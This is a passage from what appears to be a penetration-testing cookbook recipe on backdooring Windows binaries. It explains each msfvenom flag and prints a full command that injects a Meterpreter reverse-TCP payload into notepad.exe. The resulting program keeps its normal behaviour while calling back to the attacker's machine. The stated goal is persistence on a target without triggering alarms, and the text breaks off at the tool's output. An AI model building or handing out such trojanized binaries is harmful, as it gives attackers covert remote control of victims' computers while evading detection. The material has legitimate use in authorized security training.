Backdooring Windows binaries
By backdooring system binaries, we can ensure that we will have persistence in the target machine, and we won't trigger alarms by adding new registry entries or new binaries to the system.
How to do it...
- We will use
msfvenom
to backdoor thenotepad.exe
binary:- Use
-a
for the architecture, in this case,x86
--platform
for the platform of the payload Windows-p
, for the payload to usewindows/meterpreter/reverse_tcp
,LHOST
followed by the IP address of our Kali machine-x
to specify a custom executable file to use as a template; in this recipe, we will usenotepad.exe
-k
to preserve the template behavior and inject the payload as a new thread-f
for the output format-b
to specify characters to avoid; in this case, null bytes"\x00"
and-o
for the output name of the payload:
- Use
root@kali:~# msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.216.5 -x notepad.exe -k -f exe -b "\x00" -o notepad-backdoored.exe Found 10 compatible encoders Attempting...